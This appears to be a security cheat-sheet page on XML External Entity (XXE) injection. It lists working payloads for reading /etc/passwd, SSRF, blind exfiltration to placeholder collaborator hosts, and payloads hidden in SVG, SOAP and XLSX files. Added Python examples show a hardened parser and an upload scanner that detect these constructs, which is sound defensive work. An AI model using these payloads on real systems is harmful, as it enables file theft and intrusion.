pwny.cc
XML External Entity (XXE)

Exploiting XXE to retrieve files

Classic XXE

Display content of /etc/passwd.
```xml
<?xml version="1.0"?><!DOCTYPE root [<!ENTITY test SYSTEM 'file:///etc/passwd'>]><root>&test;</root>
```
```xml
<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [
<!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "file:///etc/passwd" >]><foo>&xxe;</foo>
```

Classic XXE Base64 encoded

The base64 string decodes to file:///etc/passwd.

```xml
<!DOCTYPE test [ <!ENTITY % init SYSTEM "data://text/plain;base64,ZmlsZTovLy9ldGMvcGFzc3dk"> %init; ]><foo/>
```

PHP Wrapper inside XXE

```xml
<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [
<!ELEMENT foo ANY >
<!ENTITY % xxe SYSTEM "php://filter/convert.base64-encode/resource=index.php" >
]>
<foo>&xxe;</foo>
```

XInclude attack

```xml
<foo xmlns:xi="http://www.w3.org/2001/XInclude">
<xi:include parse="text" href="file:///etc/passwd"/></foo>
```

Exploiting XXE to perform SSRF attacks

```xml
<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [
<!ELEMENT foo ANY >
<!ENTITY % xxe SYSTEM "http://127.0.0.1:5000/secret_pass.txt" >
]>
<foo>&xxe;</foo>
```
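The defence against the file-retrieval, XInclude and SSRF payloads above is a parser that never processes the constructs they rely on. The following is an added example (not code from pwny.cc or from PayloadsAllTheThings) using only Python's standard-library expat binding: `parse_permissive` shows how a stock parser substitutes an entity reference such as `&test;` with whatever the DTD declared, and `parse_untrusted` refuses any DOCTYPE, entity declaration, external entity reference or XInclude element before the document body is touched. The sample documents, the `collaborator.example` hostname and all function names are constructed for this example.

```python
"""Parse untrusted XML with the stdlib expat parser while refusing the constructs XXE relies on."""
import xml.parsers.expat

XINCLUDE_NS = "http://www.w3.org/2001/XInclude"


class UnsafeXMLError(ValueError):
    """Raised when untrusted XML contains a DTD, an entity or an XInclude element."""


def _collect(parser, xml_bytes: bytes, forbid_xinclude: bool = False):
    """Run the parser and return (element local names in order, concatenated text)."""
    names: list[str] = []
    chars: list[str] = []

    def start(name, attrs):
        # With namespace_separator=" " expat reports "<namespace-uri> <local-name>".
        if forbid_xinclude and name.startswith(XINCLUDE_NS + " "):
            raise UnsafeXMLError("rejected untrusted XML: XInclude element")
        names.append(name.rsplit(" ", 1)[-1])

    parser.StartElementHandler = start
    parser.CharacterDataHandler = chars.append
    parser.Parse(xml_bytes, True)
    return names, "".join(chars)


def parse_permissive(xml_bytes: bytes):
    """Reference behaviour: a stock expat parser expands entities declared in the DTD."""
    parser = xml.parsers.expat.ParserCreate(namespace_separator=" ")
    return _collect(parser, xml_bytes)


def parse_untrusted(xml_bytes: bytes):
    """Hardened variant with the same output shape.

    Any DOCTYPE, entity declaration, external entity reference or XInclude
    element aborts parsing with UnsafeXMLError.
    """
    parser = xml.parsers.expat.ParserCreate(namespace_separator=" ")

    def reject(what: str):
        raise UnsafeXMLError(f"rejected untrusted XML: {what}")

    # Refusing the DTD outright is the simplest rule: without a DOCTYPE there is
    # nowhere to declare a general or parameter entity at all.
    parser.StartDoctypeDeclHandler = (
        lambda name, sysid, pubid, has_internal: reject(f"DOCTYPE {name!r}")
    )
    # Defence in depth, in case the DOCTYPE rule is ever relaxed.
    parser.EntityDeclHandler = lambda *args: reject("entity declaration")
    parser.ExternalEntityRefHandler = lambda *args: reject("external entity reference")
    return _collect(parser, xml_bytes, forbid_xinclude=True)


def is_rejected(xml_bytes: bytes) -> bool:
    """True when the hardened parser refuses the document."""
    try:
        parse_untrusted(xml_bytes)
    except UnsafeXMLError:
        return True
    return False


# Constructed samples: the DTD and XInclude shapes of the payloads above, with
# placeholder locations. Not taken from any real target.
SAFE_DOC = b"<root><name>alice</name></root>"
INTERNAL_ENTITY_DOC = (
    b'<?xml version="1.0"?><!DOCTYPE root [<!ENTITY test "expanded">]><root>&test;</root>'
)
FILE_ENTITY_DOC = (
    b"<?xml version=\"1.0\"?><!DOCTYPE root [<!ENTITY test SYSTEM 'file:///etc/passwd'>]>"
    b"<root>&test;</root>"
)
PARAM_ENTITY_DOC = (
    b'<!DOCTYPE root [<!ENTITY % ext SYSTEM "http://collaborator.example/x"> %ext;]><r></r>'
)
XINCLUDE_DOC = (
    b'<foo xmlns:xi="http://www.w3.org/2001/XInclude">'
    b'<xi:include parse="text" href="file:///etc/passwd"/></foo>'
)

if __name__ == "__main__":
    print(parse_permissive(INTERNAL_ENTITY_DOC))  # (['root'], 'expanded')
    for doc in (SAFE_DOC, INTERNAL_ENTITY_DOC, FILE_ENTITY_DOC, PARAM_ENTITY_DOC, XINCLUDE_DOC):
        print(is_rejected(doc), doc[:40])
```

Two points worth noting. First, expat itself never fetches `file://` or `http://` targets unless the application installs an `ExternalEntityRefHandler`; the payloads on this page work against parsers that resolve external entities by default (several libxml2 and JAXP configurations do), so the equivalent switches there are "disable DTDs" and "disable external general and parameter entities". Second, XInclude is processed by a separate stage in parsers that support it, so disabling entities alone does not cover the `xi:include` payload; that processing has to be switched off, or the element refused, as done here.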

Exploiting blind XXE to exfiltrate data out-of-band

Sometimes the result is not displayed in the page, but you can still extract the data with an out-of-band attack.

Blind XXE

The easiest way to test for a blind XXE is to try to load a remote resource, such as a Burp Collaborator URL.

```xml
<?xml version="1.0" ?>
<!DOCTYPE root [
<!ENTITY % ext SYSTEM "http://YOURBURCOLLABORATOR.net/x"> %ext;
]>
<r></r>
```
Send the content of /etc/passwd to www.web.com (you may receive only the first line).

```xml
<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [
<!ELEMENT foo ANY >
<!ENTITY % xxe SYSTEM "file:///etc/passwd" >
<!ENTITY callhome SYSTEM "www.web.com/?%xxe;">
]>
<foo>&callhome;</foo>
```

XXE in weird files

XXE inside SVG

```xml
<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" width="300" version="1.1" height="200">
<image xlink:href="expect://ls" width="200" height="200"></image>
</svg>
```

XXE inside SOAP

```xml
<soap:Body>
<foo>
<![CDATA[<!DOCTYPE doc [<!ENTITY % dtd SYSTEM "http://x.x.x.x:22/"> %dtd;]><xxx/>]]>
</foo>
</soap:Body>
```

XXE inside XLSX file

Extract the Excel file (an .xlsx is a zip archive of XML parts).

```console
$ mkdir XXE && cd XXE
$ unzip ../XXE.xlsx
Archive: ../XXE.xlsx
inflating: xl/drawings/drawing1.xml
inflating: xl/worksheets/sheet1.xml
inflating: xl/worksheets/_rels/sheet1.xml.rels
inflating: xl/sharedStrings.xml
inflating: xl/styles.xml
inflating: xl/workbook.xml
inflating: xl/_rels/workbook.xml.rels
inflating: _rels/.rels
inflating: [Content_Types].xml
```
Add your blind XXE payload inside xl/workbook.xml.

```xml
<xml...>
<!DOCTYPE x [ <!ENTITY xxe SYSTEM "http://YOURCOLLABORATORID.burpcollaborator.net/"> ]>
<x>&xxe;</x>
<workbook...>
```
Alternatively, add your payload in xl/sharedStrings.xml:

```xml
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<!DOCTYPE foo [ <!ELEMENT t ANY > <!ENTITY xxe SYSTEM "http://YOURCOLLABORATORID.burpcollaborator.net/"> ]>
<sst xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" count="10" uniqueCount="10"><si><t>&xxe;</t></si><si><t>testA2</t></si><si><t>testA3</t></si><si><t>testA4</t></si><si><t>testA5</t></si><si><t>testB1</t></si><si><t>testB2</t></si><si><t>testB3</t></si><si><t>testB4</t></si><si><t>testB5</t></si></sst>
```
Rebuild the Excel file.

```console
$ zip -r ../poc.xlsx *
updating: [Content_Types].xml (deflated 71%)
updating: _rels/ (stored 0%)
updating: _rels/.rels (deflated 60%)
updating: docProps/ (stored 0%)
updating: docProps/app.xml (deflated 51%)
updating: docProps/core.xml (deflated 50%)
updating: xl/ (stored 0%)
updating: xl/workbook.xml (deflated 56%)
updating: xl/worksheets/ (stored 0%)
updating: xl/worksheets/sheet1.xml (deflated 53%)
updating: xl/styles.xml (deflated 60%)
updating: xl/theme/ (stored 0%)
updating: xl/theme/theme1.xml (deflated 80%)
updating: xl/_rels/ (stored 0%)
updating: xl/_rels/workbook.xml.rels (deflated 66%)
updating: xl/sharedStrings.xml (deflated 17%)
```
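The blind, SVG, SOAP and XLSX variants above all share one property: the DTD or dangerous reference is present in the raw bytes before any parser runs, even when it is wrapped in CDATA or buried in a part of a zipped OOXML package. A pre-parse screen on those bytes is therefore a cheap detection layer for file uploads and SOAP endpoints. The following is an added example (not code from pwny.cc or PayloadsAllTheThings, and standard-library only): `scan_xml_bytes` reports DTD, entity, parameter-entity, XInclude and scheme indicators in a single document, and `scan_ooxml` unpacks a package in memory and applies the same checks to every `.xml` and `.rels` part, which the unzip/zip sequence above shows is where a payload would be placed. The indicator set, the scheme list, the sample parts and the `collaborator.example` / `192.0.2.10` placeholders are assumptions constructed for this example.

```python
"""Pre-parse screening of XML-based uploads (SVG, SOAP bodies, OOXML packages such as .xlsx)."""
import io
import re
import zipfile

# Byte-level indicators checked before any XML parser runs. Scanning raw bytes
# means a DTD inside a CDATA section or inside a zipped part is still seen.
# The scheme list mirrors the payloads above (an assumption to extend per
# deployment); http(s) is only flagged when it appears inside a DTD declaration.
INDICATORS = {
    "doctype": re.compile(rb"<!DOCTYPE\b"),
    "entity_declaration": re.compile(rb"<!ENTITY\b"),
    "external_identifier": re.compile(rb"<!(?:DOCTYPE|ENTITY)[^>]*\b(?:SYSTEM|PUBLIC)\b"),
    "parameter_entity_reference": re.compile(rb"%[A-Za-z_][\w.-]*;"),
    "xinclude": re.compile(rb"""xmlns(?::\w+)?=["']http://www\.w3\.org/2001/XInclude["']"""),
    "dangerous_scheme": re.compile(rb"\b(?:file|php|expect|data)://", re.IGNORECASE),
}

OOXML_XML_PARTS = (".xml", ".rels")


def scan_xml_bytes(data: bytes) -> list[str]:
    """Return the names of every indicator present in one raw XML document."""
    return [name for name, pattern in INDICATORS.items() if pattern.search(data)]


def scan_ooxml(package: bytes) -> dict[str, list[str]]:
    """Unpack an OOXML zip in memory and scan each XML part.

    Returns {part name: indicators} for the parts that trigger at least one check;
    an empty dict means the package is clean under these checks.
    """
    findings: dict[str, list[str]] = {}
    with zipfile.ZipFile(io.BytesIO(package)) as zf:
        for info in zf.infolist():
            if info.is_dir() or not info.filename.lower().endswith(OOXML_XML_PARTS):
                continue
            hits = scan_xml_bytes(zf.read(info))
            if hits:
                findings[info.filename] = hits
    return findings


def build_package(parts: dict[str, bytes]) -> bytes:
    """Zip a set of parts into an in-memory package (used here to construct test files)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        for name, data in parts.items():
            zf.writestr(name, data)
    return buf.getvalue()


# Constructed samples, trimmed to the parts the scanner cares about.
CLEAN_PARTS = {
    "[Content_Types].xml": b'<?xml version="1.0" encoding="UTF-8" standalone="yes"?>'
    b'<Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types"/>',
    "_rels/.rels": b'<?xml version="1.0" encoding="UTF-8" standalone="yes"?>'
    b'<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"/>',
    "xl/workbook.xml": b'<?xml version="1.0" encoding="UTF-8" standalone="yes"?>'
    b'<workbook xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main"/>',
    "xl/sharedStrings.xml": b'<?xml version="1.0" encoding="UTF-8" standalone="yes"?>'
    b'<sst xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" count="1" uniqueCount="1">'
    b"<si><t>testA2</t></si></sst>",
}
# Same shapes as the workbook, SVG and SOAP payloads above, with placeholder hosts.
TAMPERED_WORKBOOK = (
    b'<?xml version="1.0"?><!DOCTYPE x [ <!ENTITY xxe SYSTEM "http://collaborator.example/"> ]>'
    b"<x>&xxe;</x>"
)
SVG_SAMPLE = (
    b'<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink">'
    b'<image xlink:href="expect://ls" width="200" height="200"/></svg>'
)
SOAP_SAMPLE = (
    b"<soap:Body><foo><![CDATA["
    b'<!DOCTYPE doc [<!ENTITY % dtd SYSTEM "http://192.0.2.10:22/"> %dtd;]><xxx/>'
    b"]]></foo></soap:Body>"
)

if __name__ == "__main__":
    print(scan_xml_bytes(SVG_SAMPLE))
    print(scan_xml_bytes(SOAP_SAMPLE))
    print(scan_ooxml(build_package(CLEAN_PARTS)))
    print(scan_ooxml(build_package({**CLEAN_PARTS, "xl/workbook.xml": TAMPERED_WORKBOOK})))
```

Run `scan_ooxml` on the uploaded bytes before the file reaches the spreadsheet library and reject on any finding: legitimate OOXML parts never carry a DOCTYPE, so a single hit is a strong signal rather than a heuristic. The screen is a detection layer, not a substitute for a parser that has DTDs and external entities disabled; the two belong together.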

References

PayloadsAllTheThings / XXE Injection (swisskyrepo/PayloadsAllTheThings on GitHub)
XXE Payloads Repository